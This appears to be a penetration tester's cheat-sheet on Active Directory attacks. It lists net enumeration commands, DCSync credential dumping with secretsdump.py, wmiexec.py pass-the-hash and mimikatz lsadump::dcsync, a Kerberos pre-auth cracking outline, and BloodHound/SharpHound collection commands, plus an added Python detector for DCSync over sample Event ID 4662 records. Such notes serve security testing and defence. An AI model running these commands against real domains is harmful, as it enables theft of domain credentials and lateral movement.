Active Directory
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.
-- Wikipedia
Related: Target, Domain Admins group, Domain Controller
General
Display permissions using PowerShell
dsacls "DC=<domain>,DC=<domain>"
net
List local accounts
net user
List domain accounts
net user /domain
Details about specific user
net user <user> /domain
List domain groups
net group /domain
Show domain's account policy
net accounts
DC sync attack
DC Sync Attacks With Secretsdump.py - YouTube
secretsdump.py <domain>/<user>:<pw>@<ip>
wmiexec.py <domain>/<user>@<ip> -hashes "<hash>"
Alternative approach (probably gets flagged by AV): copy mimikatz.exe to the DC, execute it there and run
lsadump::dcsync
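Added example (not part of these notes): detection logic for the DCSync technique above, run over constructed Event ID 4662 (Directory Service Access) records. Both replication attempts in the section, secretsdump.py and lsadump::dcsync, exercise the replication control access rights, so a 4662 event carrying those rights from a principal that is not a domain controller is the signal; the reduced field names and sample values are assumptions.

```python
# Added example: flag Event ID 4662 records in which an account other than a
# known domain controller exercised the directory replication control access
# rights that DCSync relies on. Field names and sample records are assumed.

# Control access right GUIDs for directory replication (AD schema constants).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)


def is_dc_computer_account(subject, dc_hostnames):
    """Computer accounts end with '$'; expected replication comes from known DCs."""
    if not subject.endswith("$"):
        return False
    return subject[:-1].upper() in {h.upper() for h in dc_hostnames}


def find_dcsync_suspects(events, dc_hostnames, allowed_accounts=()):
    """Return (time, subject, object) for 4662 events that used a replication
    right from a principal that is neither a known DC nor explicitly allowed."""
    allowed = {a.lower() for a in allowed_accounts}
    suspects = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        if not any(guid in props for guid in REPLICATION_GUIDS):
            continue
        subject = ev.get("SubjectUserName", "")
        if is_dc_computer_account(subject, dc_hostnames) or subject.lower() in allowed:
            continue  # DC-to-DC replication and approved sync accounts are expected
        suspects.append((ev.get("TimeCreated"), subject, ev.get("ObjectName")))
    return suspects


# Constructed sample records (reduced field set, not real log output).
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2024-01-10T09:00:01", "SubjectUserName": "DC02$",
     "ObjectName": "DC=corp,DC=local",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-01-10T09:05:42", "SubjectUserName": "j.doe",
     "ObjectName": "DC=corp,DC=local",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-01-10T09:06:00", "SubjectUserName": "j.doe",
     "ObjectName": "CN=Users,DC=corp,DC=local",
     "Properties": "Read Property {deadbeef-0000-0000-0000-000000000000}"},  # placeholder GUID
]

if __name__ == "__main__":
    for hit in find_dcsync_suspects(SAMPLE_EVENTS, ["DC01", "DC02"]):
        print("possible DCSync:", hit)
```

4662 events are only written when the Audit Directory Service Access subcategory is enabled on the DCs, so the check depends on that audit policy being in place.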
Pre-Auth attack
Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube
1. sniff KRB auth packet
2. crack using hashcat
-> If no pre-auth is required, just use Impacket to pull hashes from AD.
BloodHound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. GitHub - BloodHoundAD/BloodHound
Gather information (on target)
pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All
OR
.\SharpHound.exe -c all -d <domain> --domaincontroller <dc-ip>
Copy generated *BloodHound.zip
OR
SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>
Analyze data (on kali)
neo4j console
bloodhound
Connect to the database at bolt://localhost:7687 with user neo4j and password <PW>
Import data: Upload Data, then select the .csv, .json or .zip file(s)